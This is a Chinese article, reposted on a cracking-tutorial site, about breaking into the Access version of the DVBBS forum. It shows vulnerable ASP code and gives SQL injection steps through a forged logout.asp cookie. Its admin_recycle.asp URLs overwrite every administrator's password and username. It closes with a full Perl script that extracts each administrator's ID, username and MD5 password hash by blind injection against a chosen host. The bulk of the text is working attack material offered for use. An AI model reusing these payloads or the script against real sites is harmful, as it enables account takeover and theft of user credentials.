您的位置:首页精文荟萃破解文章 → 绝对背后的微笑

绝对背后的微笑

时间:2004/10/15 0:59:00来源:本站整理作者:蓝点我要评论(0)

 

Envymask的睿智帮我解决了很多问题,尽管是兄弟,我还是要说谢谢。


很吃惊地看到了DVBBS发布的安全补丁,原来有人提醒了作者程序所存在的一类漏洞。可以看出,作者对DVBBS做了全面检测,并且在消除那一类漏洞的同时,也顺带消除了其他几个安全隐患。看到自己曾耗费数小时换来的“劳动成果”被作者解决,心中有点不快。


有人、文章错误地认为:动网即使存在漏洞,也只能真正威胁MSSQL版;而ACCESS版的用户敏感信息MD5加密和后台管理的SESSION+COOKIE验证则让大家认为它牢不可破:“顶多让你得到MD5加密后的密码,你还能做什么呢?”、“我们只有暴力破解”、“动网已经是非常安全的程序了”...在一个失落的清晨,我偶然发现了这位亲爱的朋友,她静静地站在绝对的背后,微笑...


因此,本文展示如何攻破“所谓安全”的ACCESS版DVBBS;由于MSSQL版的漏洞利用简单乏味,拒绝介绍。另外,请相关朋友速打补丁。


攻击分两步,首先得到管理员MD5加密的敏感信息,接着在此基础上更改后台管理员密码。


一:得到任意用户MD5加密的敏感信息
可以利用 logout.asp、messanger.asp、myfile.asp...等一大批文件所存在的Sql Injection漏洞达到目的。这些漏洞文件中logout.asp让我稍感新意,选它来说明问题:
logout.asp:
/--------------------------------------------------------------------------



<%
dim activeuser
membername=request.cookies("aspsky")("username")
if session("userid")<>"" then
activeuser="delete from online where id="&session("userid")
Conn.Execute activeuser
end if
if membername<>"" then
activeuser="delete from online where username="&membername&""
Conn.Execute activeuser
end if
Response.Cookies("aspsky").path=cookiepath
Response.Cookies("aspsky")("username")=""
Response.Cookies("aspsky")("password")=""
Response.Cookies("aspsky")("userclass")=""
Response.Cookies("aspsky")("userid")=""
Response.Cookies("aspsky")("userhidden")=""
Response.Cookies("aspsky")("usercookies")=""
session("userid")=""
conn.close
set conn=nothing
response.redirect("index.asp")
%>
/--------------------------------------------------------------------------
问题语句: activeuser="delete from online where username="&membername&""
很多人会问:这也能利用?
能!
步骤:
1:注册一用户并登陆;
2:在COOKIE中构造membername请求logout.asp,以图程序所执行的SQL查询语句中包含我们利用逻辑关系添加的子语句;
3:构造参数请求主页面,如返回页面包含用户注册名,重复第 2 步;
4:得到敏感信息。


测试程序附后。


二:闯入后台管理
我们已经得到管理员MD5加密的敏感信息,现在可以利用COOKIE欺骗可以在前台执行管理员操作。如果你依然坚持暴力破解,并认为这很有趣,你可以停止阅读本文了。


鄙视暴力破解。不是说不现实,而是说这很乏味。


admin_recycle.asp
/--------------------------------------------------------------------------
...
topicid=request("topicid")
if request("action")<>"清空回收站" then
if topicid="" or isnull(topicid) then
Errmsg=Errmsg+"

  • "+"请选择相关帖子后进行操作。"
    Founderr=true
    end if
    end if
    if request("tablename")="topic" then
    tablename="topic"
    elseif instr(request("tablename"),"bbs")>0 then
    tablename=request("tablename")
    else
    Errmsg=Errmsg+"
  • "+"错误的系统参数!"
    Founderr=true
    end if
    if not master then
    Errmsg=Errmsg+"
  • "+"您不是系统管理员或者您还没有登陆。"
    Founderr=true
    end if
    ...
    还原回收站内容
    sub redel()
    dim tempnum,todaynum
    if instr(tablename,"bbs")>0 then
    sql="update "&tablename&" set locktopic=0 where Announceid in ("&TopicID&")"
    conn.execute(sql)
    ...
    /--------------------------------------------------------------------------
    问题:
    1:未采用SESSION认证
    2:topicid没有过滤
    3:仅要求tablename包含bbs而不采取其他任何过滤(目前依然未修正)


    Tablename和TopicID前后呼应,真是天合之作。提交


    http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid=%20where%20id%20in%20(9&tablename=admin%20set%20[password]=ef7813118e77b0ee,lastloginip=bbs


    实际执行的是


    update admin set [password]=ef7813118e77b0ee, lastloginip=bbs set locktopic=0 where Announceid in ( where id in (9)


    这样,ID为 9 的后台管理员的密码就被修改为 ilikecat (ef7813118e77b0ee)。


    提交如上URL后,页面会返回出错提示。这是因为后面的SQL语句有语法错误,别管它,我们要求执行的语句已经在它之前“正确”执行了。


    注意:前台管理员和后台管理员是一一对应的,弄错了不能正确登陆后台。为了省事,你可以:


    http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid=%20where%20(1=1&tablename=admin%20set%20[password]=ef7813118e77b0ee,lastloginip=bbs


    所有后台管理员密码修改为 ilikecat (ef7813118e77b0ee)


    http://www.psych.com/d6/admin_recycle.asp?action=还原&topicid=%20where%20(1=1&tablename=admin%20set%20username=catlikeme,lastloginip=bbs


    所有后台管理员用户名修改为 catlikeme


    当然,最好不要无聊到把所有注册用户的帐号和密码全修改了。


    OK,本地COOKIE做些处理后,劳请使用 catlikeme/ilikecat 登陆后台进行“管理”。


    /--------------------[获取任意用户MD5加密信息的测试程序:


    #!/usr/bin/perl
    #Codz By PsKey
    #Exploit of DVBBSs logout.asp


    #--------------------------------------------------------------------------
    # 本脚本针对动网论坛logout.asp文件缺陷而写,可以推算出所有用户
    # MD5加密密码;另外可以自动破解后台管理员ID、username、password
    # 脚本参照最新版本编写,若低版本出现不能用的情况,请自行修改程序
    # 脚本利用方法:
    # 1:在目标论坛以 ilikecat/catlikeme 注册一用户,并得到此用户的 userid
    # 2:再另注册一任意用户(此步不可少)
    # 3:运行脚本,按帮助输入命令参数
    # 如果是MSSQL版,请把这段糟糕的脚本扔到一边
    #--------------------------------------------------------------------------


    $|=1;
    use Socket;
    use Getopt::Std;
    getopt(hpwium);


    print "\n ===================================================\n";
    print " Exploit of DVBBSs logout.asp\n";
    print " Codz By PsKey \n";
    print " www.isgrey.com && c4st.51.net \n";
    print " Thanx Envymask<130\@21cn.com> \n";
    print " ===================================================\n";


    &usage unless ( defined($opt_h) && defined($opt_w) && defined($opt_i) && defined($opt_m));


    $host=$opt_h;
    $port=$opt_p||80;
    $path=$opt_w;
    $userid=$opt_i;
    $user=$opt_u;
    $mode=$opt_m;


    if ($opt_m eq "p") {
    &usage unless defined($opt_u);
    print "\nPlease wait...\n\n";
    for ($j=1;$j<=16;$j++) {
    @dic1=(0..9);
    @dic2=(a..f);
    @dic=(@dic1,@dic2);
    &first;
    for ($i=0;$i<@dic;$i++) {
    print "$dic[$i]";
    $key=$pws.$dic[$i];
    $target = "ilikecat%20and%20exists%20(select%20UserID%20from%20[user]%20where%20UserName=$user%20and%20left(UserPassword,$j)=$key)%20and%201=1";
    &second;
    if ("@in" !~ /ilikecat/) {
    $th=$j.th;
    print "\n\/\/------------The $th word of the password is $dic[$i]";
    $pws=$pws.$dic[$i];
    last;
    }
    }
    }
    print "\n\nSuccessful,the full password of $user is $pws.\n";
    }


    elsif ($opt_m eq "b") {


    #Crack ID
    print "\n\#\#\#\#\#\#\#\#\#\#\#Start cracking admins id...";
    &first;
    for ($i=0;$i<=50;$i++) {
    $target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$i)%20and%201=1";
    &second;
    if ("@in" !~ /ilikecat/) {
    print "\n--------->>There is one admins id $i";
    push (@id,$i);
    &first;
    }
    }
    print "\n\#\#\#\#\#\#\#\#\#\#\#End cracking admins id...\n";
    sleep(2);


    #Crack the length of admins username
    print "\n\#\#\#\#\#\#\#\#\#\#\#Start Cracking the length of admins username...\n";
    for ($j=0;$j<@id;$j++) {
    print " \|\-\>cracking usernames length which id is $id[$j] ...";
    &first;
    for ($i=0;$i<=50;$i++) {
    $target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20len(username)=$i%20and%20id=$id[$j])%20and%201=1";
    &second;
    if ("@in" !~ /ilikecat/) {
    print "\n--------->>The length of $id[$j] is $i";
    push (@len,$i);
    &first;
    last;
    }
    }
    }
    print "\n\#\#\#\#\#\#\#\#\#\#\#End Cracking the length of admins username...\n";
    sleep(2);


    #Crack admins username
    print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmins username...\n";
    @dic1=(0..9);
    @dic2=(a..z);
    @dic=(@dic1,@dic2);
    for ($j=0;$j<@id;$j++) {
    $pws="";
    print " \|\-\>cracking username which id is $id[$j] ...";
    OUTER: for ($k=1;$k<=$len[$j];$k++) {
    &first;
    USERNAME: for ($i=0;$i<@dic;$i++) {
    print "$dic[$i].";
    $key=$pws.$dic[$i];
    $target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(username,$k)=$key)%20and%201=1";
    &second;
    if ("@in" !~ /ilikecat/) {
    $th=$k.th;
    print "\n--------->>The $th word of $id[$j] username is $dic[$i]";
    $pws=$pws.$dic[$i];
    last USERNAME;
    }
    if ($dic[$i] eq "z") {
    print "\ni cant crack this admins name,maybe it is chinese.\n";
    push (@user,"\?");
    last OUTER;
    }
    }
    }
    push (@user,$pws);
    print "\n========>>The username is $pws which id is $id[$j]\n";
    }
    print "\n\#\#\#\#\#\#\#\#\#\#\#End Crackadmins username...\n";
    sleep(2);


    #Crack admins password
    print "\n\#\#\#\#\#\#\#\#\#\#\#Start Crackadmins password...\n";
    @dic1=(0..9);
    @dic2=(a..f);
    @dic=(@dic1,@dic2);
    for ($j=0;$j<@id;$j++) {
    $pws="";
    print " \|\-\>cracking password which id is $id[$j] ...";
    for ($k=1;$k<=16;$k++) {
    &first;
    PASSWORD: for ($i=0;$i<@dic;$i++) {
    print "$dic[$i].";
    $key=$pws.$dic[$i];
    $target = "ilikecat%20and%20exists%20(select%20id%20from%20[admin]%20where%20id=$id[$j]%20and%20left(password,$k)=$key)%20and%201=1";
    &second;
    if ("@in" !~ /ilikecat/) {
    $th=$k.th;
    print "\n--------->>The $th word of $id[$j] password is $dic[$i]";
    $pws=$pws.$dic[$i];
    last PASSWORD;
    }
    }
    }
    push (@pass,$pws);
    print "\n\n========>>The password is $pws which id is $id[$j]\n\n";
    }
    print "\#\#\#\#\#\#\#\#\#\#\#End Crackadmins password...\n\n";
    print "We got them now:\n";
    printf("%-4s %-20s %-16s\n",ID,UserName,PassWord);
    for ($i=0;$i<@id;$i++) {
    printf("%-4d %-20s %-16s\n",$id[$i],$user[$i],$pass[$i]);
    }
    }


    else {
    &usage;
    }


    sub first {
    $str="username=ilikecat&password=catlikeme&CookieDate=1";
    $len=length($str);
    $req = "GET $path/login.asp?action=chk&username=ilikecat&password=catlikeme HTTP/1.1\n".
    "Referer: http://$host$path/login.asp\n".
    "Host: $host\n".
    "Content-Length: $len\n".
    "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show;upNum=0\n".
    "\n".
    "$str\n\n";
    print "\n.";
    sendraw($req);
    $req0 = "GET $path/index.asp HTTP/1.0\n".
    "Referer: http://$host$path/index.asp\n".
    "Host: $host\n".
    "Cookie: aspsky=userid=$userid&usercookies=0&userhidden=2&password=aac9ac496fa5ea8e&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=ilikecat; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
    print ".\n";
    sendraw($req0);
    }


    sub second {
    $req1 = "GET $path/logout.asp HTTP/1.0\n".
    "Host: $host\n".
    "Cookie: aspsky=userid=$userid&usercookies=1&userhidden=2&username=$target; iscookies=0; BoardList=BoardID=Show; \n\n";
    print ".";
    @res = sendraw($req1);
    $req2 = "GET $path/index.asp?action=show HTTP/1.0\n".
    "Referer: http://$host$path/index.asp?action=show \n".
    "Host: $host\n".
    "Cookie: aspsky=usercookies=&userid=&userclass=&username=&userhidden=&password=; iscookies=0; BoardList=BoardID=Show; upNum=0\n\n";
    print ".";
    @in = sendraw($req2);
    }


    sub usage {
    print qq~
    Usage: $0 -h [-p ] -w -i -m [-u ]
    -h =hostname you want to attack
    -p =port,80 default
    -w =the web path such as "/dvbbs"
    -i =the userid of ilikecat
    -m =only two choice,b and p(This option need -u)
    -u =the user you want to crack
    Eg: 1.Crack proscenium
    $0 -h www.target.com -p 80 -w /dvbbs -i 2 -m p -u admin
    2.Crack background
    $0 -h www.target.com -p 80 -w /dvbbs -i 2 -m b
    ~;
    exit;
    }


    sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname(tcp)||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
    select(S);
    $| = 1;
    print $req;
    my @res = ;
    select(STDOUT);
    close(S);
    return @res;
    }
    else {
    die("Cant connect...\n");
    }
    }


        
        
         
        
        
         

    • 相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么

    文章评论
    发表评论

    热门文章 去除winrar注册框方法

    最新文章 比特币病毒怎么破解 比去除winrar注册框方法 华为无线路由器HG522-C破解教程(附超级密码JEB格式文件京东电子书下载和阅读限制破解教UltraISO注册码全集(最新)通过Access破解MSSQL获得数据

    人气排行 华为无线路由器HG522-C破解教程(附超级密码JEB格式文件京东电子书下载和阅读限制破解教UltraISO注册码全集(最新)qq相册密码破解方法去除winrar注册框方法(适应任何版本)怎么用手机破解收费游戏华为无线猫HG522破解如何给软件脱壳基础教程